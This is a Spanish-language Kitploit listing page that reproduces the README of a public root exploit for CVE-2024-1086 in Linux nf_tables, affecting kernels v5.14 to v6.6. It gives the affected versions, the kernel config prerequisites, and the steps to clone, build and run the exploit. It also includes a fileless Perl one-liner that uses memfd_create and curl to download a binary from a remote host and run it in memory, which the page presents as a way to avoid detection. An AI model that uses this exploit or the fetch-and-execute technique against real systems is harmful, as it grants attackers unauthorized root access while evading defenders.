Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-1086 — Exploit de escalada de privilegios local para CVE-2024-1086 dirigido a kernels de Linux v5.14 a v6.6, con una tasa de éxito del 99.4% en entornos KernelCTF. | Kitploit
Herramientas/GitHubGitHub/ccievoice2009/cve-2024-1086
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubccievoice2009/cve-2024-1086

CVE-2024-1086

Exploit de escalada de privilegios local para CVE-2024-1086 dirigido a kernels de Linux v5.14 a v6.6, con una tasa de éxito del 99.4% en entornos KernelCTF.

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-1086

Exploit de prueba de concepto universal para escalada de privilegios local para CVE-2024-1086, que funciona en la mayoría de kernels de Linux entre v5.14 y v6.6, incluyendo Debian, Ubuntu y KernelCTF. La tasa de éxito es del 99.4% en imágenes de KernelCTF.

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

Artículo del blog / Explicación

Un análisis completo del exploit - incluyendo información de fondo y muchos diagramas útiles - se puede encontrar en el artículo de Flipping Pages.

Versiones afectadas

El exploit afecta a las versiones desde (incluyendo) v5.14 hasta (incluyendo) v6.6, excluyendo las ramas parcheadas v5.15.149>, v6.1.76>, v6.6.15>. El parche para estas versiones se lanzó en febrero de 2024. La vulnerabilidad subyacente afecta a todas las versiones (excluyendo ramas estables parcheadas) desde v3.15 hasta v6.8-rc1.

Advertencias:

  • El exploit no funciona en kernels v6.4> con kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (incluyendo Ubuntu v6.5)
  • El exploit requiere namespaces de usuario (kconfig CONFIG_USER_NS=y), que esos namespaces de usuario no tengan privilegios (comando sh sysctl kernel.unprivileged_userns_clone = 1), y que nf_tables esté habilitado (kconfig CONFIG_NF_TABLES=y). Por defecto, todo esto está habilitado en Debian, Ubuntu y KernelCTF. Otras distribuciones no han sido probadas, pero también podrían funcionar. Además, el exploit solo se ha probado en x64/amd64.
  • El exploit puede ser muy inestable en sistemas con mucha actividad de red
    • Los sistemas con adaptador WiFi, cuando están rodeados de redes WiFi de alto uso, serán muy inestables.
    • En dispositivos de prueba, apague los adaptadores WiFi a través de la BIOS.
  • El pánico del kernel (bloqueo del sistema) después de ejecutar el exploit es un efecto secundario que deliberadamente no se ha corregido para evitar el uso malicioso del exploit (es decir, los intentos de explotación ahora deberían ser más notorios e imprácticos en operaciones del mundo real). A pesar de esto, todavía permite una prueba de concepto funcional en entornos de laboratorio, ya que el shell de root es funcional y es posible la persistencia a través del disco.

Uso

Configuración

Los valores predeterminados deberían funcionar sin problemas en Debian, Ubuntu y KernelCTF con un shell local. En configuraciones/distribuciones no probadas, asegúrese de que los valores de kconfig coincidan con el kernel objetivo. Estos se pueden especificar en src/config.h. Si está ejecutando el exploit en una máquina con más de 32 GiB de memoria física, asegúrese de aumentar CONFIG_PHYS_MEM. Si está ejecutando el exploit a través de SSH (en la máquina de prueba) o un shell inverso, es posible que desee cambiar CONFIG_REDIRECT_LOG a 1 para evitar actividad de red innecesaria.

Compilación

Si esto no es práctico para usted, hay un binario x64 compilado con la configuración predeterminada.

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

Binario: CVE-2024-1086/exploit

Ejecución

Ejecutar el exploit es igual de trivial:

root@kitploit:~
./exploit

La ejecución sin archivos también es compatible, en caso de situaciones de pruebas de penetración donde se deban evitar detecciones. Sin embargo, Perl debe estar instalado en el objetivo:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

Descargo de responsabilidad

Los programas y scripts ("programas") en este directorio/carpeta/repositorio de software ("repositorio") se publican, desarrollan y distribuyen únicamente con fines educativos/de investigación. Yo ("el creador") no apruebo ningún uso malicioso o ilegal de los programas en este repositorio, ya que la intención es compartir investigación y no realizar actividades ilegales con ella. No soy legalmente responsable de nada que usted haga con los programas en este repositorio.

Descargar herramienta